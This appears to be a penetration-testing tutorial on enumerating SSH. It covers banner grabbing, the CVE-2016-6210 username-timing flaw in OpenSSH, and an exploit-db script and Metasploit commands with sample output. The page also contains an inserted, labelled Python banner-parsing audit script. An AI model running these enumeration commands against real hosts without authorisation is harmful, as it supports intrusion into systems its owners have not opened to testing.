Port 22 – SSH

How to enumerate port 22 (SSH)


SSH is a very popular method for communicating securely with a remote host. SSH is an old and basic technology, so most recent versions are well secured. You can find out the SSH version by scanning the port with nmap or by connecting to it with nc.

nc 192.168.1.101 22

After connecting, you will get something like this, which reveals the SSH version:

SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu1

 

OpenSSH Vulnerability: CVE-2016-6210 

sshd in OpenSSH before version 7.3, when SHA256 or SHA512 is used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist. This allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.
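For auditing your own hosts, the banner shown above can be parsed and compared against the 7.3 boundary. The following is an added example, not code from the original page; the function names and verdict strings are hypothetical, and every sample banner except the one quoted above is constructed.

```python
import re
from typing import NamedTuple, Optional, Tuple

# RFC 4253 section 4.2: "SSH-protoversion-softwareversion SP comments"
BANNER_RE = re.compile(r"^SSH-(?P<proto>[^-\s]+)-(?P<software>\S+)(?: (?P<comments>.*))?$")
OPENSSH_RE = re.compile(r"^OpenSSH_(?P<major>\d+)\.(?P<minor>\d+)")
FIXED_IN = (7, 3)  # the page states the issue affects versions before 7.3

class Banner(NamedTuple):
    proto: str
    software: str
    comments: Optional[str]                    # usually the distro package tag
    openssh_version: Optional[Tuple[int, int]]

def parse_banner(line: str) -> Banner:
    """Split an SSH identification string into its RFC 4253 fields."""
    m = BANNER_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError(f"not an SSH identification string: {line!r}")
    v = OPENSSH_RE.match(m["software"])
    version = (int(v["major"]), int(v["minor"])) if v else None
    return Banner(m["proto"], m["software"], m["comments"], version)

def assess(line: str) -> str:
    """Return a hypothetical triage verdict for CVE-2016-6210."""
    b = parse_banner(line)
    if b.openssh_version is None:
        return "unknown"            # not OpenSSH, or the version is hidden
    if b.openssh_version >= FIXED_IN:
        return "not-affected"
    # Distro builds can backport fixes without changing the upstream
    # version, so a packaged build needs its changelog checked.
    return "check-package" if b.comments else "likely-affected"

if __name__ == "__main__":
    samples = [
        "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu1",  # banner from the page
        "SSH-2.0-OpenSSH_7.4",                    # constructed
        "SSH-2.0-OpenSSH_6.6",                    # constructed
        "SSH-2.0-dropbear_2016.74",               # constructed
    ]
    for s in samples:
        print(f"{s:45} {assess(s)}")
```

The banner only reports the upstream version string, so a "check-package" result should be confirmed against the installed package's changelog before the host is counted as vulnerable.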

Manual Exploit:

https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/remote/40136.py

python 40136.py 192.168.1.101 -U /usr/share/wordlists/metasploit/unix_users.txt -e --trials 5 --bytes 10

Metasploit:

msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 192.168.1.101
RHOSTS => 192.168.1.101
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
USER_FILE => /usr/share/wordlists/metasploit/unix_users.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 192.168.1.101:22 - SSH - Checking for false positives
[*] 192.168.1.101:22 - SSH - Starting scan
[-] 192.168.1.101:22 - SSH - User '4Dgifts' not found
[-] 192.168.1.101:22 - SSH - User 'EZsetup' not found
[-] 192.168.1.101:22 - SSH - User 'secure' not found
